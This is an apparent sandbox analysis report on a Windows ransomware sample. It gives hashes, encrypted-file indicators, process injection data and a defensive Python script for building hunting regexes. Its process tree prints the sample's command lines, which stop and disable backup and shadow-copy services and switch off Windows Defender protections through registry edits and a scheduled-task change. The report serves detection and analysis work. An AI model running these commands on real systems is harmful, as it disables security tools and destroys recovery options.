Analysis

max time kernel:  20s
max time network: 143s
platform:         windows10_x64
resource:         win10-en-20211208
submitted:        13-01-2022 13:29

Static task: static1
Behavioral task: behavioral1
  Sample:   edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample:   edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
  Resource: win10-en-20211208

General

Target: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe
Size:   2.6MB
MD5:    6a998dc6f975da2f4e88849b03b34b13
SHA1:   56f7fea05977ed3a4b1b6fed4713a56008669e4b
SHA256: edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050
SHA512: 8c4ade656335d3f9ca575bfb615f8cb36107bf5cbd5c47070e97a2818953062619d06dd03a911d5f4e176709273580e1d2370da6ff5cdb555ac42e1ed09a468b
Malware Config
Signatures
-
Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
  pid   process
  3260  MpCmdRun.exe
-
Modifies security service (2 TTPs, 1 IoC)
Processes:
  description      ioc                                                                   process
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"  reg.exe
-
Clears Windows event logs (1 TTP)
-
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  pid   process
  3120  bcdedit.exe
  3048  bcdedit.exe
-
Drops file in Program Files directory (64 IoCs)
Processes (all 64 entries are "File opened for modification" by edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe):
  C:\Program Files\Common Files\System\ado\adovbs.inc
  C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui
  C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui
  C:\Program Files\Common Files\microsoft shared\ink\es-ES\InputPersonalization.exe.mui
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HAtrjrleLto0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD__kMAQggZMjg0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.security.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Y8rcwHMMJMc0.rmvlh
  C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_t002nTsWoyM0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\en-US\delete.avi
  C:\Program Files\Common Files\microsoft shared\ink\hwrusash.dat
  C:\Program Files\Common Files\microsoft shared\ink\ipsdeu.xml
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Hz9Q7pnT8DI0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_OlxUl-6lO_E0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_63giSdWhICc0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_5qsc9VZ495w0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_NlukQsWVv2E0.rmvlh
  C:\Program Files\7-Zip\Lang\eo.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_ySQX5PTCFDU0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\ipshrv.xml
  C:\Program Files\Common Files\microsoft shared\ink\ja-JP\rtscom.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\localedata.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_7ifGsyBsf5k0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_0mD4Vhi5_700.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_x1-r5Y7ZPf80.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_kMZaGAh98BA0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_AKhJYQCwcLo0.rmvlh
  C:\Program Files\Common Files\System\ado\msado25.tlb
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\license.html.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_rsAV8NSzsHA0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Rh7QysK8WQI0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.registry_1.1.300.v20130402-1529.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_tUspdsyBgZ80.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\meta-index.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_6HO7C4wUomk0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_GG2IwIw7AP80.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_-E9K7bim78s0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_cra7ndQHUEw0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RHeartbeatConfig.xml.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_DQSpc2yhtlQ0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\de-DE\FlickLearningWizard.exe.mui
  C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_wXMcF_S2EOQ0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_l9GT7ETAy0Q0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_IA66k765kn40.rmvlh
  C:\Program Files\7-Zip\Lang\uz.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_5EgAOFRnZPw0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\fr-FR\micaut.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_ru.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_aN0h3tCUm840.rmvlh
  C:\Program Files\Common Files\microsoft shared\Stationery\Green Bubbles.htm
  C:\Program Files\Common Files\microsoft shared\ink\en-US\TipRes.dll.mui
  C:\Program Files\Java\jdk1.8.0_66\db\NOTICE.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_mZvAfeCuP3g0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_AV9mZ_nhJjE0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_o1DhEets4fc0.rmvlh
  C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui
  C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_GSMon5bW7Y00.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_2omFtnuKAhs0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_N5il6ELhfjo0.rmvlh
  C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui
  C:\Program Files\Common Files\microsoft shared\ink\ipstr.xml
  C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui
  C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_dz-fxIEJ84g0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_nm3JM2-ou6A0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_ja_4.4.0.v20140623020002.jar.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_6B6bNlSAvns0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Ju4AU8GRM2E0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_vC3WbLcEwtQ0.rmvlh
  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_Wzx_xEUbnPs0.rmvlh
  C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HUbrzoMZnFE0.rmvlh
  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml
  C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_VTyJRzoLAG80.rmvlh
-
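The file list above mixes two states: paths the sample had only opened for modification, and paths it had already rewritten and renamed to `<original name>.<token>.rmvlh`. The token in every renamed entry shares a 44-character constant prefix, followed by a 12-character per-file part. The following Python helper is an added example, not part of the sandbox report: it splits the two states, recovers the original file names, extracts the constant marker by common-prefix over the observed tokens, and builds a file-name regex for hunting other hosts hit by the same run. The `PATHS` list is a constructed subset of the report's entries; the base64url character class for the token and the idea that the constant part identifies a run are this example's assumptions drawn from the listed paths, not a decoding of what the token means.

```python
"""Derive hunting indicators from the renamed-file IoCs of a sandbox report.

Added example, not part of the report. Inputs are a constructed subset of
the paths listed above.
"""
import ntpath
import os
import re

# Constructed subset of the 64 "File opened for modification" paths above.
PATHS = [
    r"C:\Program Files\Common Files\System\ado\adovbs.inc",
    r"C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\PYCC.pf.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_HAtrjrleLto0.rmvlh",
    r"C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD__kMAQggZMjg0.rmvlh",
    r"C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_t002nTsWoyM0.rmvlh",
    r"C:\Program Files\Common Files\microsoft shared\ink\en-US\delete.avi",
    r"C:\Program Files\7-Zip\Lang\eo.txt.-EAbgWe66DBo4mwrakcaQCEcojnk6P2vYLeqkhz93CD_ySQX5PTCFDU0.rmvlh",
]

EXT = ".rmvlh"
# Assumption: <original>.<token>.rmvlh, token drawn from the base64url
# alphabet, as every renamed path in the report happens to be.
RENAMED = re.compile(r"^(?P<orig>.+)\.(?P<token>[A-Za-z0-9_-]+)" + re.escape(EXT) + r"$")


def split_renamed(path):
    """Return (original basename, token) for a renamed file, or None."""
    m = RENAMED.match(ntpath.basename(path))      # ntpath: Windows paths on any OS
    return (m.group("orig"), m.group("token")) if m else None


def original_path(path):
    """The path the file had before the rename (unchanged if not renamed)."""
    hit = split_renamed(path)
    return ntpath.join(ntpath.dirname(path), hit[0]) if hit else path


def summarize(paths):
    """Split renamed from merely-opened files and derive hunting indicators."""
    renamed, opened_only = {}, []
    for p in paths:
        hit = split_renamed(p)
        (renamed.__setitem__(p, hit) if hit else opened_only.append(p))
    tokens = [tok for _, tok in renamed.values()]
    # The part every token shares is the run-specific marker; the rest varies per file.
    marker = os.path.commonprefix(tokens) if tokens else ""
    suffix_lengths = sorted({len(tok) - len(marker) for tok in tokens})
    suffix_re = (r"[A-Za-z0-9_-]{%d}" % suffix_lengths[0]
                 if len(suffix_lengths) == 1 else r"[A-Za-z0-9_-]+")
    return {
        "renamed": len(renamed),
        "opened_only": len(opened_only),
        "marker": marker,
        "suffix_lengths": suffix_lengths,
        "hunt_regex": re.escape(marker) + suffix_re + re.escape(EXT) + "$",
        "originals": sorted(original_path(p) for p in renamed),
    }


def matches_hunt(path, summary):
    """True if a file name matches the run-specific hunting regex."""
    return re.search(summary["hunt_regex"], ntpath.basename(path)) is not None


if __name__ == "__main__":
    s = summarize(PATHS)
    print(f"renamed={s['renamed']} opened_only={s['opened_only']}")
    print("marker:", s["marker"])
    print("hunt regex:", s["hunt_regex"])
    for orig in s["originals"]:
        print("  restore name:", orig)
```

Feeding the full 64-path list gives the same marker; the per-file suffix is the only thing that changes, so the `hunt_regex` (marker plus a 12-character suffix plus `.rmvlh`) is narrower than matching on the extension alone and will not fire on files encrypted by a different run of the same family.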
Launches sc.exe
sc.exe is the Windows utility that controls services on the system.
-
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid  process
  376  vssadmin.exe
-
Modifies registry class (3 IoCs)
Processes:
  description  ioc                                                                          process
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP          reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP      reg.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes:
  pid   process                                                                 entries
  980   powershell.exe                                                          3
  3188  powershell.exe                                                          3
  2476  edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  2
-
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  pid   process       privileges enabled (Token:)
  3236  wevtutil.exe  SeSecurityPrivilege, SeBackupPrivilege
  1444  wevtutil.exe  SeSecurityPrivilege, SeBackupPrivilege
  2824  wevtutil.exe  SeSecurityPrivilege, SeBackupPrivilege
  3716  wmic.exe      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (reported by number only)
  3220  wmic.exe      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (reported by number only)
  3220  wmic.exe      second pass: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege (the 64-entry list ends here)
-
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (each write is listed twice in the report; shown once here):
  source pid  source process                                                          target pid  target process
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3820        net.exe
  3820        net.exe                                                                 3716        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3736        net.exe
  3736        net.exe                                                                 3668        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1292        net.exe
  1292        net.exe                                                                 660         net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  928         net.exe
  928         net.exe                                                                 2356        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  628         net.exe
  628         net.exe                                                                 3748        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1656        net.exe
  1656        net.exe                                                                 2292        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  524         net.exe
  524         net.exe                                                                 3392        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1416        net.exe
  1416        net.exe                                                                 1044        net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  612         net.exe
  612         net.exe                                                                 932         net1.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  2648        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  2576        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1180        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  2672        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3688        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1528        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1716        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1988        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3960        sc.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  2316        reg.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3296        reg.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3536        reg.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  3264        reg.exe
  2476        edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  1028        reg.exe
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe  (PID 2476)
    command line: "C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SYSTEM32\net.exe  (PID 3820)
        command line: net.exe stop "SamSs" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 3716)
            command line: C:\Windows\system32\net1 stop "SamSs" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 3736)
        command line: net.exe stop "SDRSVC" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 3668)
            command line: C:\Windows\system32\net1 stop "SDRSVC" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 1292)
        command line: net.exe stop "SstpSvc" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 660)
            command line: C:\Windows\system32\net1 stop "SstpSvc" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 928)
        command line: net.exe stop "UI0Detect" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 2356)
            command line: C:\Windows\system32\net1 stop "UI0Detect" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 628)
        command line: net.exe stop "vmicvss" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 3748)
            command line: C:\Windows\system32\net1 stop "vmicvss" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 1656)
        command line: net.exe stop "VSS" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 2292)
            command line: C:\Windows\system32\net1 stop "VSS" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 524)
        command line: net.exe stop "wbengine" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 3392)
            command line: C:\Windows\system32\net1 stop "wbengine" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 1416)
        command line: net.exe stop "WebClient" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 1044)
            command line: C:\Windows\system32\net1 stop "WebClient" /y
    [2] C:\Windows\SYSTEM32\net.exe  (PID 612)
        command line: net.exe stop "UnistoreSvc_12c95" /y
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\net1.exe  (PID 932)
            command line: C:\Windows\system32\net1 stop "UnistoreSvc_12c95" /y
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 2648)
        command line: sc.exe config "SamSs" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 2576)
        command line: sc.exe config "SDRSVC" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 1180)
        command line: sc.exe config "SstpSvc" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 2672)
        command line: sc.exe config "UI0Detect" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 3688)
        command line: sc.exe config "vmicvss" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 1528)
        command line: sc.exe config "VSS" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 1716)
        command line: sc.exe config "wbengine" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 1988)
        command line: sc.exe config "WebClient" start= disabled
    [2] C:\Windows\SYSTEM32\sc.exe  (PID 3960)
        command line: sc.exe config "UnistoreSvc_12c95" start= disabled
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 2316)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3296)
        command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3536)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3264)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 1028)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 740)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3616)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3256)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 2216)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3872)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 1908)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3500)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 3916)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 924)
        command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 960)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\reg.exe  (PID 632)
        command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    [2] C:\Windows\SYSTEM32\schtasks.exe  (PID 436)
        command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
